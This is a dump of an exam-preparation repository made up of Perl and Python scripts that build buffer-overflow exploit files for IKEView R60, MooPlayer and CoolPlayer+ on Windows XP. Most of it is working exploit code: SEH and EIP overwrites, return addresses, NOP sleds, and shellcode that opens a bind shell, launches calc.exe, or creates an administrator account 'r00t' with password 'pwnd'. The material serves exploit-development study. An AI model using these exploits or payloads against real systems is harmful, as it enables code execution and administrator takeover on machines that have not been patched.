s_string("192.168.37.131"); 8 | s_string("\r\n"); 9 | s_string_variable("If-Modified-Since: "); 10 | s_string(Fri, 21 Apr 2000 05:09:44 GMT"); 11 | s_string("\r\n"); -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/ikeview_r60_seh/ikeview_r60_shellcode_bind.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open('key.elg' , 'w'); 4 | 5 | buffer = "A"*4424 6 | nseh = "\xeb\x18\x90\x90" 7 | seh = "\xc0\x28\x40\x00" 8 | nops = "\x90"*30 9 | shellcode = ("\xda\xde\xbe\xa6\x5a\x80\xaa\xd9\x74\x24\xf4\x58\x33\xc9\xb1" 10 | "\x52\x31\x70\x17\x03\x70\x17\x83\x66\x5e\x62\x5f\x9a\xb7\xe0" 11 | "\xa0\x62\x48\x85\x29\x87\x79\x85\x4e\xcc\x2a\x35\x04\x80\xc6" 12 | "\xbe\x48\x30\x5c\xb2\x44\x37\xd5\x79\xb3\x76\xe6\xd2\x87\x19" 13 | "\x64\x29\xd4\xf9\x55\xe2\x29\xf8\x92\x1f\xc3\xa8\x4b\x6b\x76" 14 | "\x5c\xff\x21\x4b\xd7\xb3\xa4\xcb\x04\x03\xc6\xfa\x9b\x1f\x91" 15 | "\xdc\x1a\xf3\xa9\x54\x04\x10\x97\x2f\xbf\xe2\x63\xae\x69\x3b" 16 | "\x8b\x1d\x54\xf3\x7e\x5f\x91\x34\x61\x2a\xeb\x46\x1c\x2d\x28" 17 | "\x34\xfa\xb8\xaa\x9e\x89\x1b\x16\x1e\x5d\xfd\xdd\x2c\x2a\x89" 18 | "\xb9\x30\xad\x5e\xb2\x4d\x26\x61\x14\xc4\x7c\x46\xb0\x8c\x27" 19 | "\xe7\xe1\x68\x89\x18\xf1\xd2\x76\xbd\x7a\xfe\x63\xcc\x21\x97" 20 | "\x40\xfd\xd9\x67\xcf\x76\xaa\x55\x50\x2d\x24\xd6\x19\xeb\xb3" 21 | "\x19\x30\x4b\x2b\xe4\xbb\xac\x62\x23\xef\xfc\x1c\x82\x90\x96" 22 | "\xdc\x2b\x45\x38\x8c\x83\x36\xf9\x7c\x64\xe7\x91\x96\x6b\xd8" 23 | "\x82\x99\xa1\x71\x28\x60\x22\xd2\xbd\x23\x32\x42\xbc\xb3\x23" 24 | "\xcf\x49\x55\x29\xff\x1f\xce\xc6\x66\x3a\x84\x77\x66\x90\xe1" 25 | "\xb8\xec\x17\x16\x76\x05\x5d\x04\xef\xe5\x28\x76\xa6\xfa\x86" 26 | "\x1e\x24\x68\x4d\xde\x23\x91\xda\x89\x64\x67\x13\x5f\x99\xde" 27 | "\x8d\x7d\x60\x86\xf6\xc5\xbf\x7b\xf8\xc4\x32\xc7\xde\xd6\x8a" 28 | "\xc8\x5a\x82\x42\x9f\x34\x7c\x25\x49\xf7\xd6\xff\x26\x51\xbe" 29 | "\x86\x04\x62\xb8\x86\x40\x14\x24\x36\x3d\x61\x5b\xf7\xa9\x65" 30 | "\x24\xe5\x49\x89\xff\xad\x7a\xc0\x5d\x87\x12\x8d\x34\x95\x7e" 31 | "\x2e\xe3\xda\x86\xad\x01\xa3\x7c\xad\x60\xa6\x39\x69\x99\xda" 32 | "\x52\x1c\x9d\x49\x52\x35") 33 | ds = "D" * (5000-len(buffer+nseh+seh+nops+shellcode)) 34 | 35 | sploit = buffer + nseh + seh + nops + shellcode + ds 36 | 37 | file.write(sploit) 38 | file.close() 39 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/ikeview_r60_seh/key.elg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp2/ikeview_r60_seh/key.elg -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/mooplayer_1.3.0/MooPlayer_crash.m3u: -------------------------------------------------------------------------------- 1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/mooplayer_1.3.0/MooPlayer_eip_crash.m3u: -------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9 -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/mooplayer_1.3.0/MooPlayer_messagebox.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp2/mooplayer_1.3.0/MooPlayer_messagebox.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/mooplayer_1.3.0/mooplayer_1.3.0_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | $file = "MooPlayer_crash.m3u"; 4 | 5 | my $junk = "A" x 300; 6 | 7 | open(myfile,">$file") ; 8 | print myfile $junk; 9 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/mooplayer_1.3.0/mooplayer_1.3.0_eip_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | $file = "MooPlayer_eip_crash.m3u"; 4 | 5 | my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9"; 6 | 7 | open(myfile,">$file") ; 8 | print myfile $junk; 9 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/audiocoder/audiocoder.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/audiocoder/audiocoder.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayer_beginning_buffer.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | my $junk = "\xcc" x 260; #offset to EIP 5 | my $eip = pack("V", 0x7c810395); #call ebx from kernel32.dll 6 | 7 | my $sploit = $junk.$eip; #build sploit portion of buffer 8 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 9 | my $buffer = $sploit.$fill; # build final buffer 10 | 11 | # write the exploit buffer to file 12 | 13 | my $file = "coolplayerbegbuffer.m3u"; 14 | open(FILE, ">$file"); 15 | print FILE $buffer; 16 | close(FILE); 17 | print "Exploit file created [" . $file . "]\n"; 18 | print "Buffer size: " . length($buffer). "\n"; 19 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayer_eip_takeover.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | my $junk = "\x41" x 260; #offset to EIP 5 | my $eip = "\x42" x 4; 6 | 7 | my $sploit = $junk.$eip; #build sploit portion of buffer 8 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 9 | my $buffer = $sploit.$fill; # build final buffer 10 | 11 | # write the exploit buffer to file 12 | 13 | my $file = "coolplayereiptakeover.m3u"; 14 | open(FILE, ">$file"); 15 | print FILE $buffer; 16 | close(FILE); 17 | print "Exploit file created [" . $file . "]\n"; 18 | print "Buffer size: " . length($buffer). "\n"; 19 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayer_eip_takeover_1.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | my $junk = "\x41" x 219; #offset to EIP 5 | my $eip = "\x42" x 4; 6 | 7 | my $sploit = $junk.$eip; #build sploit portion of buffer 8 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 9 | my $buffer = $sploit.$fill; # build final buffer 10 | 11 | # write the exploit buffer to file 12 | 13 | my $file = "coolplayereiptakeover1.m3u"; 14 | open(FILE, ">$file"); 15 | print FILE $buffer; 16 | close(FILE); 17 | print "Exploit file created [" . $file . "]\n"; 18 | print "Buffer size: " . length($buffer). "\n"; 19 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayer_jmp_ebx.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | 5 | my $jmp = "\x83\xc3\x64" x 3; #add 300 to ebx 6 | $jmp = $jmp . "\xff\xe3"; # jmp ebx 7 | my $junk = "\x41" x (260 - length($jmp)); #offset to EIP 8 | my $eip = pack("V", 0x7c810395); #call ebx from kernel32.dll 9 | 10 | my $nops = "\xcc" x 50; 11 | my $shell = "\x43" x 200; 12 | 13 | my $sploit = $jmp.$junk.$eip.$nops.$shell; #build sploit portion of buffer 14 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 15 | my $buffer = $sploit.$fill; # build final buffer 16 | 17 | # write the exploit buffer to file 18 | 19 | my $file = "coolplayerjmpebx.m3u"; 20 | open(FILE, ">$file"); 21 | print FILE $buffer; 22 | close(FILE); 23 | print "Exploit file created [" . $file . "]\n"; 24 | print "Buffer size: " . length($buffer). "\n"; 25 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayer_shellcode_calc.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | 5 | my $jmp = "\x83\xc3\x64" x 3; #add 300 to ebx 6 | $jmp = $jmp . "\xff\xe3"; # jmp ebx 7 | my $junk = "\x41" x (260 - length($jmp)); #offset to EIP 8 | my $eip = pack("V", 0x7c810395); #call ebx from kernel32.dll 9 | 10 | my $nops = "\xcc" x 50; 11 | 12 | #msfvenom -a x86 -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f perl 13 | 14 | my $shell = "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9" . 15 | "\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92" . 16 | "\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84" . 17 | "\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e" . 18 | "\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1" . 19 | "\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27" . 20 | "\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb" . 21 | "\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b" . 22 | "\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2" . 23 | "\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37" . 24 | "\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3" . 25 | "\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef" . 26 | "\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb" . 27 | "\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf" . 28 | "\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83" . 29 | "\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3" . 30 | "\x9a\xca\xc0"; 31 | 32 | my $sploit = $jmp.$junk.$eip.$nops.$shell; #build sploit portion of buffer 33 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 34 | my $buffer = $sploit.$fill; # build final buffer 35 | 36 | # write the exploit buffer to file 37 | 38 | my $file = "coolplayershellcodecalc.m3u"; 39 | open(FILE, ">$file"); 40 | print FILE $buffer; 41 | close(FILE); 42 | print "Exploit file created [" . $file . "]\n"; 43 | print "Buffer size: " . length($buffer). "\n"; 44 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayerbegbuffer.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayerbegbuffer.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayerjmpebx.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayerjmpebx.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayershell_meterp.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayershell_meterp.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayershellcode_att.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayershellcode_att.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayershellcodecalc.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayershellcodecalc.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/pop+ret/coolplayer_popret_aadmin.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/pop+ret/coolplayer_popret_aadmin.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/pop+ret/coolplayer_popret_addmin.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; # set consistent buffer size 4 | my $junk = "\x4A" x 260; # simulate unusable address containing junk with 'J' 5 | my $eip = pack('V',0x7C924961); # EIP overwrite w/ pop edi pop esi pop ebp from ntdll 6 | my $junk2 = "\x4A" x 12; # simulate unusable address containing junk with 'J' 7 | my $usable_address = pack('V',0x7C86467B); # jmp esp kernel32.dll 8 | my $nops = "\x90" x 20; 9 | 10 | my $shell = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23" . 11 | "\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca" . 12 | "\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63" . 13 | "\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20" . 14 | "\x6e\x65\x74\x20\x75\x73\x65\x72\x20" . 15 | "\x72\x30\x30\x74\x20" . # user: r00t 16 | "\x70\x77\x6e\x64" . # pass: pwnd 17 | "\x20\x2f\x61\x64\x64\x20\x26\x26\x20\x6e" . 18 | "\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72" . 19 | "\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69" . 20 | "\x73\x74\x72\x61\x74\x6f\x72\x73\x20". 21 | "\x72\x30\x30\x74" . 22 | "\x20\x2f\x61\x64\x64\x00"; 23 | 24 | my $sploit = $jmp.$junk.$eip.$junk2.$usable_address.$nops.$shell; # build sploit portion of buffer 25 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer 26 | my $buffer = $sploit.$fill; # build final buffer 27 | 28 | # write the exploit buffer to file 29 | my $file = "coolplayer_popret_aadmin.m3u"; 30 | open(FILE, ">$file"); 31 | print FILE $buffer; 32 | close(FILE); 33 | print "Exploit file [" . $file . "] created\n"; 34 | print "Buffer size: " . length($buffer) . "\n"; 35 | 36 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/pop+ret/coolplayer_popret_find.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/pop+ret/coolplayer_popret_find.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/pop+ret/coolplayer_popret_find.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; # set consistent buffer size 4 | 5 | my $junk = "\x4A" x 260; # simulate unusable address containing junk with "J" 6 | my $eip = "\x42" x 4; 7 | my $junk2 = "\x4A" x 12; # simulate unusable address containing junk with "J" 8 | my $usable_address = pack("V", 0x7C86467B); # jmp esp kernel32.dll 9 | my $nops = "\x90" x 20; 10 | my $shell = "\xcc" x 500; # simulate shellcode with INT 11 | my $sploit = $jmp.$junk.$eip.$junk2.$usable_address.$nops.$shell; # build sploit portion of buffer 12 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer 13 | my $buffer = $sploit.$fill; # build final buffer 14 | 15 | # write the exploit buffer to file 16 | my $file = "coolplayer_popret_find.m3u"; 17 | open(FILE, ">$file"); 18 | print FILE $buffer; 19 | close(FILE); 20 | print "Exploit file [" . $file . "] created\n"; 21 | print "Buffer size: " . length($buffer) . "\n"; 22 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/popad/coolplayer_popad.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/popad/coolplayer_popad.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/popad/coolplayer_popad.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; # set consistent buffer size 4 | my $junk = "\x41" x 260; # offset to EIP 5 | my $eip = pack('V',0x7C93121B); # EIP overwrite w/ popad ret (ntdll) 6 | my $regs = "\x42" x 32; # account for registers populated by popad 7 | my $esp = pack('V',0x7C86467B); # jmp esp kernel32.dll 8 | my $nops = "\x90" x 20; 9 | 10 | # modified messagebox shellcode from Giuseppe D'Amore 11 | my $shell = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" . 12 | "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" . 13 | "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" . 14 | "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" . 15 | "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" . 16 | "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x4f\x46" . 17 | "\x21\x01\x68\x61\x64\x20\x42\x68\x20\x50\x6f\x70\x89\xe1\xfe" . 18 | "\x49\x0b\x31\xc0\x51\x50\xff\xd7"; 19 | 20 | my $sploit = $junk.$eip.$regs.$esp.$nops.$shell; # build sploit portion of buffer 21 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer 22 | my $buffer = $sploit.$fill; # build final buffer 23 | 24 | 25 | # write the exploit buffer to file 26 | my $file = "coolplayer_popad.m3u"; 27 | open(FILE, ">$file"); 28 | print FILE $buffer; 29 | close(FILE); 30 | print "Exploit file [" . $file . "] created\n"; 31 | print "Buffer size: " . length($buffer) . "\n"; 32 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/popad/coolplayer_popad2.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/popad/coolplayer_popad2.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/popad/coolplayer_popad2.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; # set consistent buffer size 4 | my $junk = "\x41" x 260; # offset to EIP 5 | my $eip = pack('V',0x7C86467B); # EIP overwrite w/ popad ret (ntdll) 6 | my $jmp = "\x61"; # popad 7 | $jmp = $jmp . "\xff\xe4"; 8 | my $regs = "\x42" x 32; # account for registers populated by popad 9 | my $nops = "\x90" x 20; 10 | 11 | # modified messagebox shellcode from Giuseppe D'Amore 12 | my $shell = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" . 13 | "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" . 14 | "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" . 15 | "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" . 16 | "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" . 17 | "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x4f\x46" . 18 | "\x21\x01\x68\x61\x64\x20\x42\x68\x20\x50\x6f\x70\x89\xe1\xfe" . 19 | "\x49\x0b\x31\xc0\x51\x50\xff\xd7"; 20 | 21 | my $sploit = $junk.$eip.$regs.$esp.$nops.$shell; # build sploit portion of buffer 22 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer 23 | my $buffer = $sploit.$fill; # build final buffer 24 | 25 | 26 | # write the exploit buffer to file 27 | my $file = "coolplayer_popad2.m3u"; 28 | open(FILE, ">$file"); 29 | print FILE $buffer; 30 | close(FILE); 31 | print "Exploit file [" . $file . "] created\n"; 32 | print "Buffer size: " . length($buffer) . "\n"; 33 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/push(reg)+ret/coolplayer_shellcode_pushregret_calc.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | 5 | my $jmp = "\x83\xc3\x64" x 3; #add 300 to ebx 6 | $jmp = $jmp . "\xff\xe3"; # jmp ebx 7 | my $junk = "\x41" x (260 - length($jmp)); #offset to EIP 8 | my $eip = pack("V", 0x7CA5F15B); #call ebx from kernel32.dll 9 | 10 | my $nops = "\x90" x 50; 11 | 12 | #msfvenom -a x86 -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f perl 13 | 14 | my $shell = "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9" . 15 | "\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92" . 16 | "\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84" . 17 | "\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e" . 18 | "\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1" . 19 | "\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27" . 20 | "\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb" . 21 | "\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b" . 22 | "\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2" . 23 | "\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37" . 24 | "\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3" . 25 | "\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef" . 26 | "\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb" . 27 | "\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf" . 28 | "\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83" . 29 | "\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3" . 30 | "\x9a\xca\xc0"; 31 | 32 | my $sploit = $jmp.$junk.$eip.$nops.$shell; #build sploit portion of buffer 33 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 34 | my $buffer = $sploit.$fill; # build final buffer 35 | 36 | # write the exploit buffer to file 37 | 38 | my $file = "coolplayer_shellcode_subregjump_calc.m3u"; 39 | open(FILE, ">$file"); 40 | print FILE $buffer; 41 | close(FILE); 42 | print "Exploit file created [" . $file . "]\n"; 43 | print "Buffer size: " . length($buffer). "\n"; 44 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/push(reg)+ret/coolplayer_shellcode_subregjump_calc.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/push(reg)+ret/coolplayer_shellcode_subregjump_calc.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/shortjump/coolplayer_shortjump.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/shortjump/coolplayer_shortjump.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/sub(reg)+jmp/coolplayer_shellcode_subregjump_calc.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | 5 | my $jmp = "\x83\xec\x64" x 2; #decrement esp by 200 6 | $jmp = $jmp . "\x83\xec\x28"; #decrement esp by 40 7 | $jmp = $jmp . "\xff\xe4"; #jmp esp 8 | 9 | 